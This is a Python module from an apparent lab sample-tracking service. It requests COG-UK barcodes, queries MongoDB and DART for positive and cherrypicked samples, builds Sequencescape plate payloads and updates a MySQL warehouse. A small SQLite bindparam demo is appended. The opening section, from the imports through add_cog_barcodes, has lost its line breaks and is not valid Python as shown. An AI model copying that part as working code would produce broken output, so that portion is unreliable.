import copy import logging from http import HTTPStatus from typing import Any, Dict, List, Optional import requests from flask import current_app as app from lighthouse.constants import ( FIELD_COG_BARCODE, FIELD_COORDINATE, FIELD_DART_CONTROL, FIELD_DART_DESTINATION_BARCODE, FIELD_DART_DESTINATION_COORDINATE, FIELD_DART_LAB_ID, FIELD_DART_RNA_ID, FIELD_DART_ROOT_SAMPLE_ID, FIELD_DART_SOURCE_BARCODE, FIELD_DART_SOURCE_COORDINATE, FIELD_LAB_ID, FIELD_PLATE_BARCODE, FIELD_RESULT, FIELD_RNA_ID, FIELD_ROOT_SAMPLE_ID, FIELD_SOURCE, POSITIVE_SAMPLES_MONGODB_FILTER, STAGE_MATCH_POSITIVE, ) from lighthouse.exceptions import ( DataError, MissingCentreError, MissingSourceError, MultipleCentresError, ) from lighthouse.helpers.dart_db import find_dart_source_samples_rows from lighthouse.helpers.mysql_db import create_mysql_connection_engine, get_table from sqlalchemy.sql.expression import and_ # type: ignore from sqlalchemy.sql.expression import bindparam # type: ignore logger = logging.getLogger(__name__) class UnmatchedSampleError(Exception): pass def add_cog_barcodes(samples: List[Dict[str, str]]) -> Optional[str]: centre_name = confirm_centre(samples) centre_prefix = get_centre_prefix(centre_name) num_samples = len(samples) logger.info(f"Getting COG-UK barcodes for {num_samples} samples") baracoda_url = ( f"http://{app.config['BARACODA_URL']}" f"/barcodes_group/{centre_prefix}/new?count={num_samples}" ) retries = app.config["BARACODA_RETRY_ATTEMPTS"] success_operation = False except_obj = None while retries > 0: try: response = requests.post(baracoda_url) if response.status_code == HTTPStatus.CREATED: success_operation = True retries = 0 barcodes = response.json()["barcodes_group"]["barcodes"] for (sample, barcode) in zip(samples, barcodes): sample[FIELD_COG_BARCODE] = barcode else: retries = retries - 1 logger.error("Unable to create COG barcodes") logger.error(response.json()) except_obj = Exception("Unable to create COG barcodes") except requests.ConnectionError: retries = retries - 1 logger.error("Unable to access baracoda") except_obj = requests.ConnectionError("Unable to access baracoda") if not success_operation and except_obj is not None: raise except_obj # return centre prefix # TODO: I didn't know how else to get centre prefix? 
    return centre_prefix


def get_centre_prefix(centre_name: str) -> Optional[str]:
    logger.debug(f"Getting the prefix for '{centre_name}'")
    try:
        # get the centre collection
        centres = app.data.driver.db.centres

        # use a case insensitive search for the centre name
        filter = {"name": {"$regex": f"^(?i){centre_name}$"}}

        assert centres.count_documents(filter) == 1

        centre = centres.find_one(filter)

        prefix = centre["prefix"]

        logger.debug(f"Prefix for '{centre_name}' is '{prefix}'")

        return prefix
    except AssertionError as e:
        # catch AssertionError before the generic Exception handler below:
        # AssertionError subclasses Exception, so the broader handler would
        # otherwise swallow it and this DataError would never be raised
        logger.exception(e)
        raise DataError("Multiple centres with the same name")
    except Exception as e:
        logger.exception(e)
        return None


def find_samples(query: Optional[Dict[str, Any]]) -> Optional[List[Dict[str, Any]]]:
    if query is None:
        return None

    samples = app.data.driver.db.samples

    samples_for_barcode = list(samples.find(query))

    logger.info(f"Found {len(samples_for_barcode)} samples")

    return samples_for_barcode


def count_samples(query: Dict[str, Any]) -> int:
    samples = app.data.driver.db.samples

    return samples.count_documents(query)


# TODO: remove once we are sure that we dont need anything other than positives
def get_samples(plate_barcode: str) -> Optional[List[Dict[str, Any]]]:
    samples_for_barcode = find_samples({FIELD_PLATE_BARCODE: plate_barcode})

    return samples_for_barcode


def get_positive_samples(plate_barcode: str) -> Optional[List[Dict[str, Any]]]:
    """Get a list of documents which correspond to filtered positive samples for a specific
    plate.

    Args:
        plate_barcode (str): the barcode of the plate to get samples for.

    Returns:
        Optional[List[Dict[str, Any]]]: the list of samples for this plate.
    """
    samples_collection = app.data.driver.db.samples

    # The pipeline defines stages which execute in sequence
    pipeline = [
        # 1. We are only interested in the samples for a particular plate
        {"$match": {FIELD_PLATE_BARCODE: plate_barcode}},
        # 2. Then run the positive match stage
        STAGE_MATCH_POSITIVE,
    ]

    samples_for_barcode = list(samples_collection.aggregate(pipeline))

    logger.info(f"Found {len(samples_for_barcode)} samples")

    return samples_for_barcode


def count_positive_samples(plate_barcode: str) -> int:
    query_filter = copy.deepcopy(POSITIVE_SAMPLES_MONGODB_FILTER)

    query_filter[FIELD_PLATE_BARCODE] = plate_barcode

    samples_for_barcode = count_samples(query_filter)

    return samples_for_barcode


def has_sample_data(plate_barcode: str) -> bool:
    sample_count = count_samples({FIELD_PLATE_BARCODE: plate_barcode})

    return sample_count > 0


def row_is_normal_sample(row):
    control_value = getattr(row, FIELD_DART_CONTROL)
    return control_value is None or control_value == "NULL" or control_value == ""


def rows_without_controls(rows):
    # build the result with a comprehension rather than accumulating into a
    # variable named `list`, which shadows the built-in
    return [row for row in rows if row_is_normal_sample(row)]


def rows_with_controls(rows):
    return [row for row in rows if not row_is_normal_sample(row)]


def query_for_cherrypicked_samples(rows):
    if rows is None or len(rows) == 0:
        return None

    mongo_query = []
    for row in rows_without_controls(rows):
        sample_query = {
            FIELD_ROOT_SAMPLE_ID: getattr(row, FIELD_DART_ROOT_SAMPLE_ID),
            FIELD_RNA_ID: getattr(row, FIELD_DART_RNA_ID),
            FIELD_LAB_ID: getattr(row, FIELD_DART_LAB_ID),
        }
        mongo_query.append(sample_query)
    return {"$or": mongo_query}


def equal_row_and_sample(row, sample):
    return (
        (sample[FIELD_ROOT_SAMPLE_ID] == getattr(row, FIELD_DART_ROOT_SAMPLE_ID))
        and (sample[FIELD_RNA_ID] == getattr(row, FIELD_DART_RNA_ID))
        and (sample[FIELD_LAB_ID] == getattr(row, FIELD_DART_LAB_ID))
    )


def find_sample_matching_row(row, samples):
    # iterate directly over the samples rather than indexing by position
    for sample in samples:
        if equal_row_and_sample(row, sample):
            return sample
    return None


def join_rows_with_samples(rows, samples):
    records = []
    for row in rows_without_controls(rows):
        records.append({"row": row_to_dict(row), "sample": find_sample_matching_row(row, samples)})

    return records


def add_controls_to_samples(rows, samples):
    control_samples = []
    for row in rows_with_controls(rows):
        control_samples.append({"row": row_to_dict(row), "sample": None})

    return samples + control_samples


def check_matching_sample_numbers(rows, samples):
    if len(samples) != len(rows_without_controls(rows)):
        msg = (
            "Mismatch in data present for destination plate: number of samples in DART and Mongo "
            "does not match"
        )
        logger.error(msg)
        raise UnmatchedSampleError(msg)


def row_to_dict(row):
    columns = [
        FIELD_DART_DESTINATION_BARCODE,
        FIELD_DART_DESTINATION_COORDINATE,
        FIELD_DART_SOURCE_BARCODE,
        FIELD_DART_SOURCE_COORDINATE,
        FIELD_DART_CONTROL,
        FIELD_DART_ROOT_SAMPLE_ID,
        FIELD_DART_RNA_ID,
        FIELD_DART_LAB_ID,
    ]
    obj = {}
    for column in columns:
        obj[column] = getattr(row, column)
    return obj


def get_cherrypicked_samples_records(barcode):
    rows = find_dart_source_samples_rows(barcode)
    samples = find_samples(query_for_cherrypicked_samples(rows))

    return join_rows_with_samples(rows, samples)


def confirm_centre(samples: List[Dict[str, str]]) -> str:
    """Confirm that the centre for all the samples is populated and the same and return the
    centre name.

    Arguments:
        samples {List} -- the list of samples to check

    Returns:
        str -- the name of the centre for these samples
    """
    logger.debug("confirm_centre()")

    try:
        # check that the 'source' field has a valid name
        for sample in samples:
            if not sample[FIELD_SOURCE]:
                raise MissingCentreError(sample)

        # create a set from the 'source' field to check we only have 1 unique centre for these
        # samples
        centre_set = {sample[FIELD_SOURCE] for sample in samples}
    except KeyError:
        raise MissingSourceError()
    else:
        if len(centre_set) > 1:
            raise MultipleCentresError()

    return centre_set.pop()


def create_post_body(barcode: str, samples: List[Dict[str, str]]) -> Dict[str, Any]:
    logger.debug(f"Creating POST body to send to SS for barcode '{barcode}'")

    wells_content = {}
    for sample in samples:
        # start each sample with empty values so a missing field trips the asserts
        # below instead of raising UnboundLocalError
        phenotype = None
        description = None
        for key, value in sample.items():
            if key.strip() == FIELD_RESULT:
                phenotype = value

            if key.strip() == FIELD_ROOT_SAMPLE_ID:
                description = value

        assert phenotype is not None
        assert description is not None
        assert sample[FIELD_COG_BARCODE] is not None

        well = {
            "content": {
                "phenotype": phenotype.strip().lower(),
                "supplier_name": sample[FIELD_COG_BARCODE],
                "sample_description": description,
            }
        }
        wells_content[sample[FIELD_COORDINATE]] = well

    body = {
        "barcode": barcode,
        "purpose_uuid": app.config["SS_UUID_PLATE_PURPOSE"],
        "study_uuid": app.config["SS_UUID_STUDY"],
        "wells": wells_content,
    }

    return {"data": {"type": "plates", "attributes": body}}


def send_to_ss(body: Dict[str, Any]) -> requests.Response:
    ss_url = f"http://{app.config['SS_HOST']}/api/v2/heron/plates"

    logger.info(f"Sending {body} to {ss_url}")

    headers = {"X-Sequencescape-Client-Id": app.config["SS_API_KEY"]}

    try:
        response = requests.post(ss_url, json=body, headers=headers)
        logger.debug(response.status_code)
    except requests.ConnectionError:
        raise requests.ConnectionError("Unable to access SS")

    return response


def update_mlwh_with_cog_uk_ids(samples: List[Dict[str, str]]) -> None:
    """Update the MLWH to write the COG UK barcode for each sample.

    Arguments:
        samples {List[Dict[str, str]]} -- list of samples to be updated
    """
    if len(samples) == 0:
        return None

    # assign db_connection to avoid UnboundLocalError in 'finally' block, in case of exception
    db_connection = None

    try:
        data = []
        for sample in samples:
            # using 'b_' prefix for the keys because bindparam() doesn't allow you to use the real
            # column names
            data.append(
                {
                    "b_root_sample_id": sample[FIELD_ROOT_SAMPLE_ID],
                    "b_rna_id": sample[FIELD_RNA_ID],
                    "b_result": sample[FIELD_RESULT],
                    "b_cog_uk_id": sample[FIELD_COG_BARCODE],
                }
            )

        sql_engine = create_mysql_connection_engine(
            app.config["WAREHOUSES_RW_CONN_STRING"], app.config["ML_WH_DB"]
        )
        table = get_table(sql_engine, app.config["MLWH_LIGHTHOUSE_SAMPLE_TABLE"])

        stmt = (
            table.update()
            .where(
                and_(
                    table.c.root_sample_id == bindparam("b_root_sample_id"),
                    table.c.rna_id == bindparam("b_rna_id"),
                    table.c.result == bindparam("b_result"),
                )
            )
            .values(cog_uk_id=bindparam("b_cog_uk_id"))
        )
        db_connection = sql_engine.connect()

        results = db_connection.execute(stmt, data)

        rows_matched = results.rowcount
        if rows_matched != len(samples):
            msg = f"""
            Updating MLWH {app.config['MLWH_LIGHTHOUSE_SAMPLE_TABLE']} table with COG UK ids was
            only partially successful.
            Only {rows_matched} of the {len(samples)} samples had matches in the MLWH
            {app.config['MLWH_LIGHTHOUSE_SAMPLE_TABLE']} table.
            """
            logger.error(msg)
            raise UnmatchedSampleError(msg)
    except Exception as e:
        msg = f"""
        Error while updating MLWH {app.config['MLWH_LIGHTHOUSE_SAMPLE_TABLE']} table with COG UK
        ids.
        {type(e).__name__}: {str(e)}
        """
        logger.error(msg)
        raise
    finally:
        if db_connection is not None:
            db_connection.close()


def map_to_ss_columns(samples: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
    mapped_samples = []

    for sample in samples:
        mapped_sample: Dict[str, Any] = {}

        mongo_row = sample["sample"]
        dart_row = sample["row"]

        try:
            if dart_row[FIELD_DART_CONTROL]:
                mapped_sample["control"] = True
                mapped_sample["control_type"] = dart_row[FIELD_DART_CONTROL]
            else:
                mapped_sample["name"] = mongo_row[FIELD_RNA_ID]
                mapped_sample["sample_description"] = mongo_row[FIELD_ROOT_SAMPLE_ID]
                mapped_sample["supplier_name"] = mongo_row[FIELD_COG_BARCODE]
                mapped_sample["phenotype"] = "positive"

            # coordinate and barcode apply to both controls and samples
            mapped_sample["coordinate"] = dart_row[FIELD_DART_DESTINATION_COORDINATE]
            mapped_sample["barcode"] = dart_row[FIELD_DART_DESTINATION_BARCODE]
        except KeyError as e:
            msg = f"""
            Error while mapping database columns to Sequencescape columns for sample
            {mongo_row[FIELD_ROOT_SAMPLE_ID]}.
            {type(e).__name__}: {str(e)}
            """
            logger.error(msg)
            raise
        mapped_samples.append(mapped_sample)

    return mapped_samples


def create_cherrypicked_post_body(barcode: str, samples: List[Dict[str, Any]]) -> Dict[str, Any]:
    logger.debug(
        f"Creating POST body to send to SS for cherrypicked plate with barcode '{barcode}'"
    )

    wells_content = {}
    for sample in samples:
        content = {}

        if "control" in sample:
            content["control"] = sample["control"]
            content["control_type"] = sample["control_type"]
        else:
            content["name"] = sample["name"]
            content["phenotype"] = sample["phenotype"]
            content["supplier_name"] = sample["supplier_name"]
            content["sample_description"] = sample["sample_description"]

        wells_content[sample["coordinate"]] = {"content": content}

    body = {
        "barcode": barcode,
        "purpose_uuid": app.config["SS_UUID_PLATE_PURPOSE_CHERRYPICKED"],
        "study_uuid": app.config["SS_UUID_STUDY_CHERRYPICKED"],
        "wells": wells_content,
    }

    return {"data": {"type": "plates", "attributes": body}}
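# update_mlwh_with_cog_uk_ids above relies on SQLAlchemy's bindparam() to run one
# UPDATE statement against many parameter sets at once. The sketch below is a
# self-contained illustration of that pattern, not lighthouse code: the table name,
# columns and values are invented, and an in-memory SQLite database stands in for
# the MLWH so the snippet can run anywhere SQLAlchemy is installed.
from sqlalchemy import Column, Integer, MetaData, String, Table, bindparam, create_engine

engine = create_engine("sqlite:///:memory:")
metadata = MetaData()
lighthouse_sample = Table(
    "lighthouse_sample",
    metadata,
    Column("id", Integer, primary_key=True),
    Column("root_sample_id", String),
    Column("cog_uk_id", String),
)
metadata.create_all(engine)

with engine.connect() as connection:
    # seed two rows that do not yet have a COG UK id
    connection.execute(
        lighthouse_sample.insert(),
        [
            {"root_sample_id": "ROOT-1", "cog_uk_id": None},
            {"root_sample_id": "ROOT-2", "cog_uk_id": None},
        ],
    )

    # the 'b_' prefix keeps the bind parameter names distinct from the real column
    # names, mirroring the convention used in update_mlwh_with_cog_uk_ids
    stmt = (
        lighthouse_sample.update()
        .where(lighthouse_sample.c.root_sample_id == bindparam("b_root_sample_id"))
        .values(cog_uk_id=bindparam("b_cog_uk_id"))
    )

    # passing a list of parameter dicts executes the statement once per dict
    result = connection.execute(
        stmt,
        [
            {"b_root_sample_id": "ROOT-1", "b_cog_uk_id": "COG-0001"},
            {"b_root_sample_id": "ROOT-2", "b_cog_uk_id": "COG-0002"},
        ],
    )

    # rowcount for an executemany-style UPDATE is driver dependent; the helper above
    # uses it to detect samples that had no matching row in the MLWH
    print(result.rowcount)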